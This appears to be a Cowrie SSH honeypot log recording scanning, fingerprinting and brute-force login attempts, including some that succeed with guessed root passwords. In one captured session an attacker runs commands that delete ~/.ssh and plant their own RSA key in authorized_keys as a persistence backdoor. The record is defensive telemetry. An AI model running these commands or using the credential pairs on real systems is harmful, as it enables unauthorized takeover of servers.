{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:57:08.626914Z","src_ip":"212.227.235.229","session":"7112b1d8f894"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:57:09.608036Z","src_ip":"212.227.235.229","session":"7112b1d8f894"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:57:09.842464Z","src_ip":"212.227.235.229","session":"7112b1d8f894"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:57:09.843341Z","src_ip":"212.227.235.229","session":"fd4ac17f2961"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56068,"dst_ip":"1.2.3.4","dst_port":22,"session":"621695ba4523","protocol":"ssh","message":"New connection: 212.227.125.160:56068 (1.2.3.4:22) [session: 621695ba4523]","sensor":"my-vps","timestamp":"2025-08-26T13:57:22.613828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:57:23.113389Z","src_ip":"212.227.125.160","session":"621695ba4523"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:57:23.959727Z","src_ip":"212.227.125.160","session":"621695ba4523"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-26T13:57:26.059964Z","src_ip":"212.227.125.160","session":"621695ba4523"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:57:27.390634Z","src_ip":"212.227.125.160","session":"621695ba4523"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:57:28.432853Z","src_ip":"212.227.125.160","session":"07e52fd35aa8"}
{"eventid":"cowrie.session.closed","duration":31.424211978912354,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:57:31.191659Z","src_ip":"212.227.235.229","session":"24f4342b7329"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38220,"dst_ip":"1.2.3.4","dst_port":22,"session":"cccfc49d25aa","protocol":"ssh","message":"New connection: 212.227.125.160:38220 (1.2.3.4:22) [session: cccfc49d25aa]","sensor":"my-vps","timestamp":"2025-08-26T13:57:46.626991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:57:46.628026Z","src_ip":"212.227.125.160","session":"cccfc49d25aa"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:57:46.873449Z","src_ip":"212.227.125.160","session":"cccfc49d25aa"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0l0ctyQh243O63uD","message":"login attempt [admin/0l0ctyQh243O63uD] failed","sensor":"my-vps","timestamp":"2025-08-26T13:57:48.385549Z","src_ip":"212.227.125.160","session":"cccfc49d25aa"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:57:49.756072Z","src_ip":"212.227.125.160","session":"cccfc49d25aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33502,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c845d81dda8","protocol":"ssh","message":"New connection: 212.227.235.229:33502 (1.2.3.4:22) [session: 2c845d81dda8]","sensor":"my-vps","timestamp":"2025-08-26T13:58:13.452343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:58:13.453684Z","src_ip":"212.227.235.229","session":"2c845d81dda8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:58:13.662635Z","src_ip":"212.227.235.229","session":"2c845d81dda8"}
{"eventid":"cowrie.login.success","username":"root","password":"123$qweR","message":"login attempt [root/123$qweR] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:58:14.533210Z","src_ip":"212.227.235.229","session":"2c845d81dda8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:58:14.972343Z","src_ip":"212.227.235.229","session":"2c845d81dda8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:58:14.973109Z","src_ip":"212.227.235.229","session":"2c845d81dda8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:58:14.974225Z","src_ip":"212.227.235.229","session":"2c845d81dda8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:15.187006Z","src_ip":"212.227.235.229","session":"2c845d81dda8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:58:15.737423Z","src_ip":"212.227.235.229","session":"2c845d81dda8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:58:15.738107Z","src_ip":"212.227.235.229","session":"2c845d81dda8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:58:15.944489Z","src_ip":"212.227.235.229","session":"2c845d81dda8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:15.945388Z","src_ip":"212.227.235.229","session":"2c845d81dda8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35440,"dst_ip":"1.2.3.4","dst_port":22,"session":"eaba60486a58","protocol":"ssh","message":"New connection: 212.227.235.229:35440 (1.2.3.4:22) [session: eaba60486a58]","sensor":"my-vps","timestamp":"2025-08-26T13:58:20.167778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:58:20.168762Z","src_ip":"212.227.235.229","session":"eaba60486a58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:58:20.375777Z","src_ip":"212.227.235.229","session":"eaba60486a58"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:21.946759Z","src_ip":"212.227.235.229","session":"eaba60486a58"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38687,"dst_ip":"1.2.3.4","dst_port":22,"session":"2680e78352cc","protocol":"ssh","message":"New connection: 212.227.235.229:38687 (1.2.3.4:22) [session: 2680e78352cc]","sensor":"my-vps","timestamp":"2025-08-26T13:58:22.133047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:58:22.134053Z","src_ip":"212.227.235.229","session":"2680e78352cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:58:22.336280Z","src_ip":"212.227.235.229","session":"2680e78352cc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:58:23.193001Z","src_ip":"212.227.235.229","session":"2680e78352cc"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:23.397064Z","src_ip":"212.227.235.229","session":"2680e78352cc"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:23.410865Z","src_ip":"212.227.235.229","session":"2c845d81dda8"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40474,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea7bf6d8b587","protocol":"ssh","message":"New connection: 87.120.191.13:40474 (1.2.3.4:22) [session: ea7bf6d8b587]","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.745504Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40478,"dst_ip":"1.2.3.4","dst_port":22,"session":"5419a5234ad0","protocol":"ssh","message":"New connection: 87.120.191.13:40478 (1.2.3.4:22) [session: 5419a5234ad0]","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.765227Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40486,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4672669f387","protocol":"ssh","message":"New connection: 87.120.191.13:40486 (1.2.3.4:22) [session: e4672669f387]","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.765984Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40500,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffda43c172a0","protocol":"ssh","message":"New connection: 87.120.191.13:40500 (1.2.3.4:22) [session: ffda43c172a0]","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.766939Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40512,"dst_ip":"1.2.3.4","dst_port":22,"session":"86281a71e86e","protocol":"ssh","message":"New connection: 87.120.191.13:40512 (1.2.3.4:22) [session: 86281a71e86e]","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.768095Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40516,"dst_ip":"1.2.3.4","dst_port":22,"session":"43571887d3d7","protocol":"ssh","message":"New connection: 87.120.191.13:40516 (1.2.3.4:22) [session: 43571887d3d7]","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.769113Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40528,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ac7ed57c0c6","protocol":"ssh","message":"New connection: 87.120.191.13:40528 (1.2.3.4:22) [session: 6ac7ed57c0c6]","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.770221Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40514,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c20fca3d27e","protocol":"ssh","message":"New connection: 87.120.191.13:40514 (1.2.3.4:22) [session: 3c20fca3d27e]","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.772088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:28.806162Z","src_ip":"87.120.191.13","session":"ea7bf6d8b587"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"S